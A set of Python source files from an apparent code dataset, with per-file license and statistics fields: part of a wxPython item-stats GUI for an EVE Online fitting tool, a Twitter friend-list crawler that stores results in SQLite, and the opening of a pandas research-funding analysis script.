self.UpdateList()
event.Skip()
def ToggleViewMode(self, event):
self.toggleView *= -1
self.UpdateList()
event.Skip()
def ExportItemStats(self, event):
exportFileName = self.item.name + " (" + str(self.item.ID) + ").csv"
saveFileDialog = wx.FileDialog(self, "Save CSV file", "", exportFileName,
"CSV files (*.csv)|*.csv", wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if saveFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user hit cancel...
with open(saveFileDialog.GetPath(), "wb") as exportFile:
writer = csv.writer(exportFile, delimiter=',')
writer.writerow(
[
"ID",
"Internal Name",
"Friendly Name",
"Modified Value",
"Base Value",
]
)
for attribute in self.attrValues:
try:
attribute_id = self.attrInfo[attribute].ID
except (KeyError, AttributeError):
attribute_id = ''
try:
attribute_name = self.attrInfo[attribute].name
except (KeyError, AttributeError):
attribute_name = attribute
try:
attribute_displayname = self.attrInfo[attribute].displayName
except (KeyError, AttributeError):
attribute_displayname = ''
try:
attribute_value = self.attrInfo[attribute].value
except (KeyError, AttributeError):
attribute_value = ''
try:
attribute_modified_value = self.attrValues[attribute].value
except (KeyError, AttributeError):
attribute_modified_value = self.attrValues[attribute]
writer.writerow(
[
attribute_id,
attribute_name,
attribute_displayname,
attribute_modified_value,
attribute_value,
]
)
def PopulateList(self):
self.paramList.InsertColumn(0, "Attribute")
self.paramList.InsertColumn(1, "Current Value")
if self.stuff is not None:
self.paramList.InsertColumn(2, "Base Value")
self.paramList.SetColumnWidth(0, 110)
self.paramList.SetColumnWidth(1, 90)
if self.stuff is not None:
self.paramList.SetColumnWidth(2, 90)
self.paramList.setResizeColumn(0)
self.imageList = wx.ImageList(16, 16)
self.paramList.SetImageList(self.imageList, wx.IMAGE_LIST_SMALL)
names = list(self.attrValues.iterkeys())
names.sort()
idNameMap = {}
idCount = 0
for name in names:
info = self.attrInfo.get(name)
att = self.attrValues[name]
valDefault = getattr(info, "value", None)
valueDefault = valDefault if valDefault is not None else att
val = getattr(att, "value", None)
value = val if val is not None else att
if info and info.displayName and self.toggleView == 1:
attrName = info.displayName
else:
attrName = name
if info and config.debug:
attrName += " ({})".format(info.ID)
if info:
if info.icon is not None:
iconFile = info.icon.iconFile
icon = BitmapLoader.getBitmap(iconFile, "icons")
if icon is None:
icon = BitmapLoader.getBitmap("transparent16x16", "gui")
attrIcon = self.imageList.Add(icon)
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
index = self.paramList.InsertImageStringItem(sys.maxint, attrName, attrIcon)
idNameMap[idCount] = attrName
self.paramList.SetItemData(index, idCount)
idCount += 1
if self.toggleView != 1:
valueUnit = str(value)
elif info and info.unit:
valueUnit = self.TranslateValueUnit(value, info.unit.displayName, info.unit.name)
else:
valueUnit = formatAmount(value, 3, 0, 0)
if self.toggleView != 1:
valueUnitDefault = str(valueDefault)
elif info and info.unit:
valueUnitDefault = self.TranslateValueUnit(valueDefault, info.unit.displayName, info.unit.name)
else:
valueUnitDefault = formatAmount(valueDefault, 3, 0, 0)
self.paramList.SetStringItem(index, 1, valueUnit)
if self.stuff is not None:
self.paramList.SetStringItem(index, 2, valueUnitDefault)
self.paramList.SortItems(lambda id1, id2: cmp(idNameMap[id1], idNameMap[id2]))
self.paramList.RefreshRows()
self.totalAttrsLabel.SetLabel("%d attributes. " % idCount)
self.Layout()
def TranslateValueUnit(self, value, unitName, unitDisplayName):
def itemIDCallback():
item = Market.getInstance().getItem(value)
return "%s (%d)" % (item.name, value) if item is not None else str(value)
def groupIDCallback():
group = Market.getInstance().getGroup(value)
return "%s (%d)" % (group.name, value) if group is not None else str(value)
def attributeIDCallback():
attribute = Attribute.getInstance().getAttributeInfo(value)
return "%s (%d)" % (attribute.name.capitalize(), value)
trans = {"Inverse Absolute Percent": (lambda: (1 - value) * 100, unitName),
"Inversed Modifier Percent": (lambda: (1 - value) * 100, unitName),
"Modifier Percent": (
lambda: ("%+.2f" if ((value - 1) * 100) % 1 else "%+d") % ((value - 1) * 100), unitName),
"Volume": (lambda: value, u"m\u00B3"),
"Sizeclass": (lambda: value, ""),
"Absolute Percent": (lambda: (value * 100), unitName),
"Milliseconds": (lambda: value / 1000.0, unitName),
"typeID": (itemIDCallback, ""),
"groupID": (groupIDCallback, ""),
"attributeID": (attributeIDCallback, "")}
override = trans.get(unitDisplayName)
if override is not None:
v = override[0]()
if isinstance(v, str):
fvalue = v
elif isinstance(v, (int, float, long)):
fvalue = formatAmount(v, 3, 0, 0)
else:
fvalue = v
return "%s %s" % (fvalue, override[1])
else:
return "%s %s" % (formatAmount(value, 3, 0), unitName)
class ItemCompare(wx.Panel):
def __init__(self, parent, stuff, item, items, context=None):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.paramList = AutoListCtrl(self, wx.ID_ANY,
style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)
mainSizer.Add(self.paramList, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.toggleView = 1
self.stuff = stuff
self.currentSort = None
self.sortReverse = False
self.item = item
self.items = sorted(items,
key=lambda x: x.attributes['metaLevel'].value if 'metaLevel' in x.attributes else None)
self.attrs = {}
# get a dict of attrName: attrInfo of all unique attributes across all items
for item in self.items:
for attr in item.attributes.keys():
if item.attributes[attr].info.displayName:
self.attrs[attr] = item.attributes[attr].info
# Process attributes for items and find ones that differ
for attr in self.attrs.keys():
value = None
for item in self.items:
# we can automatically break here if this item doesn't have the attribute,
# as that means at least one item did
if attr not in item.attributes:
break
# this is the first attribute for the item set, set the initial value
if value is None:
value = item.attributes[attr].value
continue
if attr not in item.attributes or item.attributes[attr].value != value:
break
else:
# attribute values were all the same, delete
del self.attrs[attr]
self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,
wx.LI_HORIZONTAL)
mainSizer.Add(self.m_staticline, 0, wx.EXPAND)
bSizer = wx.BoxSizer(wx.HORIZONTAL)
self.totalAttrsLabel = wx.StaticText(self, wx.ID_ANY, u" ", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.totalAttrsLabel, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT)
self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle view mode", wx.DefaultPosition,
wx.DefaultSize, 0)
bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)
if stuff is not None:
self.refreshBtn = wx.Button(self, wx.ID_ANY, u"Refresh", wx.DefaultPosition, wx.DefaultSize,
wx.BU_EXACTFIT)
bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshValues)
mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)
self.PopulateList()
self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)
self.Bind(wx.EVT_LIST_COL_CLICK, self.SortCompareCols)
def SortCompareCols(self, event):
self.Freeze()
self.paramList.ClearAll()
self.PopulateList(event.Column)
self.Thaw()
def UpdateList(self):
self.Freeze()
self.paramList.ClearAll()
self.PopulateList()
self.Thaw()
self.paramList.resizeLastColumn(100)
def RefreshValues(self, event):
self.UpdateList()
event.Skip()
def ToggleViewMode(self, event):
self.toggleView *= -1
self.UpdateList()
event.Skip()
def processPrices(self, prices):
for i, price in enumerate(prices):
self.paramList.SetStringItem(i, len(self.attrs) + 1, formatAmount(price.price, 3, 3, 9, currency=True))
def PopulateList(self, sort=None):
if sort is not None and self.currentSort == sort:
self.sortReverse = not self.sortReverse
else:
self.currentSort = sort
self.sortReverse = False
if sort is not None:
if sort == 0: # Name sort
func = lambda x: x.name
else:
try:
# Remember to reduce by 1, because the attrs array
# starts at 0 while the list has the item name as column 0.
attr = str(self.attrs.keys()[sort - 1])
func = lambda x: x.attributes[attr].value if attr in x.attributes else None
except IndexError:
# Clicked on a column that's not part of our array (price most likely)
self.sortReverse = False
func = lambda x: x.attributes['metaLevel'].value if 'metaLevel' in x.attributes else None
self.items = sorted(self.items, key=func, reverse=self.sortReverse)
self.paramList.InsertColumn(0, "Item")
self.paramList.SetColumnWidth(0, 200)
for i, attr in enumerate(self.attrs.keys()):
name = self.attrs[attr].displayName if self.attrs[attr].displayName else attr
self.paramList.InsertColumn(i + 1, name)
self.paramList.SetColumnWidth(i + 1, 120)
self.paramList.InsertColumn(len(self.attrs) + 1, "Price")
self.paramList.SetColumnWidth(len(self.attrs) + 1, 60)
sMkt = Market.getInstance()
sMkt.getPrices([x.ID for x in self.items], self.processPrices)
for item in self.items:
i = self.paramList.InsertStringItem(sys.maxint, item.name)
for x, attr in enumerate(self.attrs.keys()):
if attr in item.attributes:
info = self.attrs[attr]
value = item.attributes[attr].value
if self.toggleView != 1:
valueUnit = str(value)
if info and info.unit:
valueUnit = self.TranslateValueUnit(value, info.unit.displayName, info.unit.name)
else:
valueUnit = formatAmount(value, 3, 0, 0)
self.paramList.SetStringItem(i, x + 1, valueUnit)
self.paramList.RefreshRows()
self.Layout()
def TranslateValueUnit(self, value, unitName, unitDisplayName):
def itemIDCallback():
item = Market.getInstance().getItem(value)
return "%s (%d)" % (item.name, value) if item is not None else str(value)
def groupIDCallback():
group = Market.getInstance().getGroup(value)
return "%s (%d)" % (group.name, value) if group is not None else str(value)
def attributeIDCallback():
attribute = Attribute.getInstance().getAttributeInfo(value)
return "%s (%d)" % (attribute.name.capitalize(), value)
trans = {"Inverse Absolute Percent": (lambda: (1 - value) * 100, unitName),
"Inversed Modifier Percent": (lambda: (1 - value) * 100, unitName),
"Modifier Percent": (
lambda: ("%+.2f" if ((value - 1) * 100) % 1 else "%+d") % ((value - 1) * 100), unitName),
"Volume": (lambda: value, u"m\u00B3"),
"Sizeclass": (lambda: value, ""),
"Absolute Percent": (lambda: (value * 100), unitName),
"Milliseconds": (lambda: value / 1000.0, unitName),
"typeID": (itemIDCallback, ""),
"groupID": (groupIDCallback, ""),
"attributeID": (attributeIDCallback, "")}
override = trans.get(unitDisplayName)
if override is not None:
v = override[0]()
if isinstance(v, str):
fvalue = v
elif isinstance(v, (int, float, long)):
fvalue = formatAmount(v, 3, 0, 0)
else:
fvalue = v
return "%s %s" % (fvalue, override[1])
else:
return "%s %s" % (formatAmount(value, 3, 0), unitName)
class ItemRequirements(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent, style=wx.TAB_TRAVERSAL)
# itemId is set by the parent.
self.romanNb = ["0", "I", "II", "III", "IV", "V", "VI", "VII", "VIII", "IX", "X"]
self.skillIdHistory = []
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.reqTree = wx.TreeCtrl(self, style=wx.TR_DEFAULT_STYLE | wx.TR_HIDE_ROOT | wx.NO_BORDER)
mainSizer.Add(self.reqTree, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.root = self.reqTree.AddRoot("WINRARZOR")
self.reqTree.SetPyData(self.root, None)
self.imageList = wx.ImageList(16, 16)
self.reqTree.SetImageList(self.imageList)
skillBookId = self.imageList.Add(BitmapLoader.getBitmap("skill_small", "gui"))
self.getFullSkillTree(item, self.root, skillBookId)
self.reqTree.ExpandAll()
self.Layout()
def getFullSkillTree(self, parentSkill, parent, sbIconId):
for skill, level in parentSkill.requiredSkills.iteritems():
child = self.reqTree.AppendItem(parent, "%s %s" % (skill.name, self.romanNb[int(level)]), sbIconId)
if skill.ID not in self.skillIdHistory:
self.getFullSkillTree(skill, child, sbIconId)
self.skillIdHistory.append(skill.ID)
class ItemEffects(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
self.item = item
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.effectList = AutoListCtrl(self, wx.ID_ANY,
style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)
mainSizer.Add(self.effectList, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnClick, self.effectList)
if config.debug:
self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightClick, self.effectList)
self.PopulateList()
def PopulateList(self):
self.effectList.InsertColumn(0, "Name")
self.effectList.InsertColumn(1, "Active")
self.effectList.InsertColumn(2, "Type")
if config.debug:
self.effectList.InsertColumn(3, "Run Time")
self.effectList.InsertColumn(4, "ID")
# self.effectList.SetColumnWidth(0,385)
self.effectList.setResizeColumn(0)
self.effectList.SetColumnWidth(1, 50)
self.effectList.SetColumnWidth(2, 80)
if config.debug:
self.effectList.SetColumnWidth(3, 65)
self.effectList.SetColumnWidth(4, 40)
item = self.item
effects = item.effects
names = list(effects.iterkeys())
names.sort()
for name in names:
index = self.effectList.InsertStringItem(sys.maxint, name)
if effects[name].isImplemented:
if effects[name].activeByDefault:
activeByDefault = "Yes"
else:
activeByDefault = "No"
else:
activeByDefault = ""
effectTypeText = ""
if effects[name].type:
for effectType in effects[name].type:
effectTypeText += effectType + " "
pass
if effects[name].runTime and effects[name].isImplemented:
effectRunTime = str(effects[name].runTime)
else:
effectRunTime = ""
self.effectList.SetStringItem(index, 1, activeByDefault)
self.effectList.SetStringItem(index, 2, effectTypeText)
if config.debug:
self.effectList.SetStringItem(index, 3, effectRunTime)
self.effectList.SetStringItem(index, 4, str(effects[name].ID))
self.effectList.RefreshRows()
self.Layout()
def OnClick(self, event):
"""
Debug use: toggle effects on/off.
Affects *ALL* items that use that effect.
Is not stateful. Will reset if Pyfa is closed and reopened.
"""
try:
activeByDefault = getattr(self.item.effects[event.GetText()], "activeByDefault")
if activeByDefault:
setattr(self.item.effects[event.GetText()], "activeByDefault", False)
else:
setattr(self.item.effects[event.GetText()], "activeByDefault", True)
except AttributeError:
# Attribute doesn't exist, do nothing
pass
self.RefreshValues(event)
def OnRightClick(self, event):
"""
Debug use: open effect file with default application.
If effect file does not exist, create it
"""
file_ = config.getPyfaPath(os.path.join("eos", "effects", "%s.py" % event.GetText().lower()))
if not os.path.isfile(file_):
open(file_, 'a').close()
if 'wxMSW' in wx.PlatformInfo:
os.startfile(file_)
elif 'wxMac' in wx.PlatformInfo:
os.system("open " + file_)
else:
subprocess.call(["xdg-open", file_])
def RefreshValues(self, event):
self.Freeze()
self.effectList.ClearAll()
self.PopulateList()
self.effectList.RefreshRows()
self.Layout()
self.Thaw()
event.Skip()
class ItemAffectedBy(wx.Panel):
ORDER = [Fit, Ship, Citadel, Mode, Module, Drone, Fighter, Implant, Booster, Skill]
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
self.stuff = stuff
self.item = item
self.activeFit = gui.mainFrame.MainFrame.getInstance().getActiveFit()
self.showRealNames = False
self.showAttrView = False
self.expand = -1
self.treeItems = []
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.affectedBy = wx.TreeCtrl(self, style=wx.TR_DEFAULT_STYLE | wx.TR_HIDE_ROOT | wx.NO_BORDER)
mainSizer.Add(self.affectedBy, 1, wx.ALL | wx.EXPAND, 0)
self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
mainSizer.Add(self.m_staticline, 0, wx.EXPAND)
bSizer = wx.BoxSizer(wx.HORIZONTAL)
self.toggleExpandBtn = wx.ToggleButton(self, wx.ID_ANY, u"Expand All", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.toggleExpandBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.toggleNameBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle Names", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.toggleNameBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle View", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)
if stuff is not None:
self.refreshBtn = wx.Button(self, wx.ID_ANY, u"Refresh", wx.DefaultPosition, wx.DefaultSize, wx.BU_EXACTFIT)
bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshTree)
self.toggleNameBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleNameMode)
self.toggleExpandBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleExpand)
self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)
mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)
self.SetSizer(mainSizer)
self.PopulateTree()
self.Layout()
self.affectedBy.Bind(wx.EVT_TREE_ITEM_RIGHT_CLICK, self.scheduleMenu)
def scheduleMenu(self, event):
event.Skip()
wx.CallAfter(self.spawnMenu, event.Item)
def spawnMenu(self, item):
self.affectedBy.SelectItem(item)
stuff = self.affectedBy.GetPyData(item)
# String is set as data when we are dealing with attributes, not stuff containers
if stuff is None or isinstance(stuff, basestring):
return
contexts = []
# Skills are different in that they don't have itemModifiedAttributes,
# which is needed if we send the container to itemStats dialog. So
# instead, we send the item.
type_ = stuff.__class__.__name__
contexts.append(("itemStats", type_))
menu = ContextMenu.getMenu(stuff if type_ != "Skill" else stuff.item, *contexts)
self.PopupMenu(menu)
def ExpandCollapseTree(self):
self.Freeze()
if self.expand == 1:
self.affectedBy.ExpandAll()
else:
try:
self.affectedBy.CollapseAll()
except:
pass
self.Thaw()
def ToggleExpand(self, event):
self.expand *= -1
self.ExpandCollapseTree()
def ToggleViewTree(self):
self.Freeze()
for item in self.treeItems:
change = self.affectedBy.GetPyData(item)
display = self.affectedBy.GetItemText(item)
self.affectedBy.SetItemText(item, change)
self.affectedBy.SetPyData(item, display)
self.Thaw()
def UpdateTree(self):
self.Freeze()
self.affectedBy.DeleteAllItems()
self.PopulateTree()
self.Thaw()
def RefreshTree(self, event):
self.UpdateTree()
event.Skip()
def ToggleViewMode(self, event):
self.showAttrView = not self.showAttrView
self.affectedBy.DeleteAllItems()
self.PopulateTree()
event.Skip()
def ToggleNameMode(self, event):
self.showRealNames = not self.showRealNames
self.ToggleViewTree()
event.Skip()
def PopulateTree(self):
# sheri was here
del self.treeItems[:]
root = self.affectedBy.AddRoot("WINPWNZ0R")
self.affectedBy.SetPyData(root, None)
self.imageList = wx.ImageList(16, 16)
self.affectedBy.SetImageList(self.imageList)
if self.showAttrView:
self.buildAttributeView(root)
else:
self.buildModuleView(root)
self.ExpandCollapseTree()
def sortAttrDisplayName(self, attr):
info = self.stuff.item.attributes.get(attr)
if info and info.displayName != "":
return info.displayName
return attr
def buildAttributeView(self, root):
"""
We first build a usable dictionary of items. The key is either a fit
if the afflictions stem from a projected fit, or self.stuff if they
are local afflictions (everything else, even gang boosts at this time)
The value of this is yet another dictionary in the following format:
"attribute name": {
"Module Name": [
class of affliction,
affliction item (required due to GH issue #335)
modifier type
amount of modification
whether this affliction was projected
]
}
"""
attributes = self.stuff.itemModifiedAttributes if self.item == self.stuff.item else self.stuff.chargeModifiedAttributes
container = {}
for attrName in attributes.iterAfflictions():
# if value is 0 or there has been no change from original to modified, return
if attributes[attrName] == (attributes.getOriginal(attrName) or 0):
continue
for fit, afflictors in attributes.getAfflictions(attrName).iteritems():
for afflictor, modifier, amount, used in afflictors:
if not used or afflictor.item is None:
continue
if fit.ID != self.activeFit:
# affliction fit does not match our fit
if fit not in container:
container[fit] = {}
items = container[fit]
else:
# local afflictions
if self.stuff not in container:
container[self.stuff] = {}
items = container[self.stuff]
# items hold our module: info mappings
if attrName not in items:
items[attrName] = []
if afflictor == self.stuff and getattr(afflictor, 'charge', None):
# we are showing a charges modifications, see #335
item = afflictor.charge
else:
item = afflictor.item
items[attrName].append(
(type(afflictor), afflictor, item, modifier, amount, getattr(afflictor, "projected", False)))
# Make sure projected fits are on top
rootOrder = container.keys()
rootOrder.sort(key=lambda x: self.ORDER.index(type(x)))
# Now, we take our created dictionary and start adding stuff to our tree
for thing in rootOrder:
# This block simply directs which parent we are adding to (root or projected fit)
if thing == self.stuff:
parent = root
else: # projected fit
icon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
child = self.affectedBy.AppendItem(root, "{} ({})".format(thing.name, thing.ship.item.name), icon)
parent = child
attributes = container[thing]
attrOrder = sorted(attributes.keys(), key=self.sortAttrDisplayName)
for attrName in attrOrder:
attrInfo = self.stuff.item.attributes.get(attrName)
displayName = attrInfo.displayName if attrInfo and attrInfo.displayName != "" else attrName
if attrInfo:
if attrInfo.icon is not None:
iconFile = attrInfo.icon.iconFile
icon = BitmapLoader.getBitmap(iconFile, "icons")
if icon is None:
icon = BitmapLoader.getBitmap("transparent16x16", "gui")
attrIcon = self.imageList.Add(icon)
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
if self.showRealNames:
display = attrName
saved = displayName
else:
display = displayName
saved = attrName
# this is the attribute node
child = self.affectedBy.AppendItem(parent, display, attrIcon)
self.affectedBy.SetPyData(child, saved)
self.treeItems.append(child)
items = attributes[attrName]
items.sort(key=lambda x: self.ORDER.index(x[0]))
for itemInfo in items:
afflictorType, afflictor, item, attrModifier, attrAmount, projected = itemInfo
if afflictorType == Ship:
itemIcon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
elif item.icon:
bitmap = BitmapLoader.getBitmap(item.icon.iconFile, "icons")
itemIcon = self.imageList.Add(bitmap) if bitmap else -1
else:
itemIcon = -1
displayStr = item.name
if projected:
displayStr += " (projected)"
if attrModifier == "s*":
attrModifier = "*"
penalized = "(penalized)"
else:
penalized = ""
# this is the Module node, the attribute will be attached to this
display = "%s %s %.2f %s" % (displayStr, attrModifier, attrAmount, penalized)
treeItem = self.affectedBy.AppendItem(child, display, itemIcon)
self.affectedBy.SetPyData(treeItem, afflictor)
def buildModuleView(self, root):
"""
We first build a usable dictionary of items. The key is either a fit
if the afflictions stem from a projected fit, or self.stuff if they
are local afflictions (everything else, even gang boosts at this time)
The value of this is yet another dictionary in the following format:
"Module Name": [
class of affliction,
set of afflictors (such as 2 of the same module),
info on affliction (attribute name, modifier, and modification amount),
item that will be used to determine icon (required due to GH issue #335)
whether this affliction is actually used (unlearned skills are not used)
]
"""
attributes = self.stuff.itemModifiedAttributes if self.item == self.stuff.item else self.stuff.chargeModifiedAttributes
container = {}
for attrName in attributes.iterAfflictions():
# if value is 0 or there has been no change from original to modified, return
if attributes[attrName] == (attributes.getOriginal(attrName) or 0):
continue
for fit, afflictors in attributes.getAfflictions(attrName).iteritems():
for afflictor, modifier, amount, used in afflictors:
if not used or getattr(afflictor, 'item', None) is None:
continue
if fit.ID != self.activeFit:
# affliction fit does not match our fit
if fit not in container:
container[fit] = {}
items = container[fit]
else:
# local afflictions
if self.stuff not in container:
container[self.stuff] = {}
items = container[self.stuff]
if afflictor == self.stuff and getattr(afflictor, 'charge', None):
# we are showing a charges modifications, see #335
item = afflictor.charge
else:
item = afflictor.item
# items hold our module: info mappings
if item.name not in items:
items[item.name] = [type(afflictor), set(), [], item, getattr(afflictor, "projected", False)]
info = items[item.name]
info[1].add(afflictor)
# If info[1] > 1, there are two separate modules working.
# Check to make sure we only include the modifier once
# See GH issue 154
if len(info[1]) > 1 and (attrName, modifier, amount) in info[2]:
continue
info[2].append((attrName, modifier, amount))
# Make sure projected fits are on top
rootOrder = container.keys()
rootOrder.sort(key=lambda x: self.ORDER.index(type(x)))
# Now, we take our created dictionary and start adding stuff to our tree
for thing in rootOrder:
# This block simply directs which parent we are adding to (root or projected fit)
if thing == self.stuff:
parent = root
else: # projected fit
icon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
child = self.affectedBy.AppendItem(root, "{} ({})".format(thing.name, thing.ship.item.name), icon)
parent = child
items = container[thing]
order = items.keys()
order.sort(key=lambda x: (self.ORDER.index(items[x][0]), x))
for itemName in order:
info = items[itemName]
afflictorType, afflictors, attrData, item, projected = info
counter = len(afflictors)
if afflictorType == Ship:
itemIcon = self.imageList.Add(BitmapLoader.getBitmap("ship_small", "gui"))
elif item.icon:
bitmap = BitmapLoader.getBitmap(item.icon.iconFile, "icons")
itemIcon = self.imageList.Add(bitmap) if bitmap else -1
else:
itemIcon = -1
displayStr = itemName
if counter > 1:
displayStr += " x {}".format(counter)
if projected:
displayStr += " (projected)"
# this is the Module node, the attribute will be attached to this
child = self.affectedBy.AppendItem(parent, displayStr, itemIcon)
self.affectedBy.SetPyData(child, afflictors.pop())
if counter > 0:
attributes = []
for attrName, attrModifier, attrAmount in attrData:
attrInfo = self.stuff.item.attributes.get(attrName)
displayName = attrInfo.displayName if attrInfo else ""
if attrInfo:
if attrInfo.icon is not None:
iconFile = attrInfo.icon.iconFile
icon = BitmapLoader.getBitmap(iconFile, "icons")
if icon is None:
icon = BitmapLoader.getBitmap("transparent16x16", "gui")
attrIcon = self.imageList.Add(icon)
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
else:
attrIcon = self.imageList.Add(BitmapLoader.getBitmap("7_15", "icons"))
if attrModifier == "s*":
attrModifier = "*"
penalized = "(penalized)"
else:
penalized = ""
attributes.append((attrName, (displayName if displayName != "" else attrName), attrModifier,
attrAmount, penalized, attrIcon))
attrSorted = sorted(attributes, key=lambda attribName: attribName[0])
for attr in attrSorted:
attrName, displayName, attrModifier, attrAmount, penalized, attrIcon = attr
if self.showRealNames:
display = "%s %s %.2f %s" % (attrName, attrModifier, attrAmount, penalized)
saved = "%s %s %.2f %s" % (
displayName if displayName != "" else attrName,
attrModifier,
attrAmount,
penalized
)
else:
display = "%s %s %.2f %s" % (
displayName if displayName != "" else attrName,
attrModifier,
attrAmount,
penalized
)
saved = "%s %s %.2f %s" % (attrName, attrModifier, attrAmount, penalized)
treeitem = self.affectedBy.AppendItem(child, display, attrIcon)
self.affectedBy.SetPyData(treeitem, saved)
self.treeItems.append(treeitem)
|
gpl-3.0
| -3,734,646,158,873,923,000
| 38.606864
| 127
| 0.56119
| false
| 4.114082
| false
| false
| false
|
mkhuthir/learnPython
|
Book_pythonlearn_com/twitter/twfriends.py
|
1
|
2583
|
import urllib.request, urllib.parse, urllib.error
import twurl
import json
import sqlite3
TWITTER_URL = 'https://api.twitter.com/1.1/friends/list.json'
conn = sqlite3.connect('friends.sqlite')
cur = conn.cursor()
cur.execute('''CREATE TABLE IF NOT EXISTS People
(id INTEGER PRIMARY KEY, name TEXT UNIQUE, retrieved INTEGER)''')
cur.execute('''CREATE TABLE IF NOT EXISTS Follows
(from_id INTEGER, to_id INTEGER, UNIQUE(from_id, to_id))''')
while True:
acct = input('Enter a Twitter account, or quit: ')
if ( acct == 'quit' ) : break
if ( len(acct) < 1 ) :
cur.execute('SELECT id,name FROM People WHERE retrieved = 0 LIMIT 1')
try:
(id, acct) = cur.fetchone()
except:
print('No unretrieved Twitter accounts found')
continue
else:
cur.execute('SELECT id FROM People WHERE name = ? LIMIT 1',
(acct, ) )
try:
id = cur.fetchone()[0]
except:
cur.execute('''INSERT OR IGNORE INTO People
(name, retrieved) VALUES ( ?, 0)''', ( acct, ) )
conn.commit()
if cur.rowcount != 1 :
print('Error inserting account:',acct)
continue
id = cur.lastrowid
url = twurl.augment(TWITTER_URL, {'screen_name': acct, 'count': '5'} )
print('Retrieving account', acct)
connection = urllib.request.urlopen(url)
data = connection.read().decode()
headers = dict(connection.getheaders())
print('Remaining', headers['x-rate-limit-remaining'])
js = json.loads(data)
# print json.dumps(js, indent=4)
cur.execute('UPDATE People SET retrieved=1 WHERE name = ?', (acct, ) )
countnew = 0
countold = 0
for u in js['users'] :
friend = u['screen_name']
print(friend)
cur.execute('SELECT id FROM People WHERE name = ? LIMIT 1',
(friend, ) )
try:
friend_id = cur.fetchone()[0]
countold = countold + 1
except:
cur.execute('''INSERT OR IGNORE INTO People (name, retrieved)
VALUES ( ?, 0)''', ( friend, ) )
conn.commit()
if cur.rowcount != 1 :
print('Error inserting account:',friend)
continue
friend_id = cur.lastrowid
countnew = countnew + 1
cur.execute('''INSERT OR IGNORE INTO Follows (from_id, to_id)
VALUES (?, ?)''', (id, friend_id) )
print('New accounts=',countnew,' revisited=',countold)
conn.commit()
cur.close()
|
mit
| -3,992,820,602,990,398,000
| 32.115385
| 77
| 0.562137
| false
| 3.855224
| false
| false
| false
|
TariqAHassan/ZeitSci
|
analysis/quantitative/quantitative.py
|
1
|
2852
|
"""
Formal Python Analyses of the Data
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Python 3.5
"""
import pandas as pd
from tqdm import tqdm
from pprint import pprint
from funding_database_tools import MAIN_FOLDER
from easymoney.easy_pandas import pandas_print_full
# ------------------------------------------------------------------------------------------------
# Read in Data
# ------------------------------------------------------------------------------------------------
funding = pd.read_pickle(MAIN_FOLDER + "/Data/MasterDatabase/" + "MasterDatabaseRC8.p")
tqdm("status")
# ------------------------------------------------------------------------------------------------
# Most by Funding Year
# ------------------------------------------------------------------------------------------------
funding['StartYear'] = funding['StartYear'].astype(float)
range_funding = funding[(funding['StartYear'] >= 2005) & (funding['StartYear'] <= 2015)]
db_total = range_funding['NormalizedAmount'].sum()
d = {c: range_funding[range_funding['FunderBlock'].str.upper() == c.upper()]['NormalizedAmount'] \
.sum() / db_total for c in funding['FunderBlock'].unique()}
block_dict = {k: round(float(v) * 100, 1) for k, v in d.items()}
# ------------------------------------------------------------------------------------------------
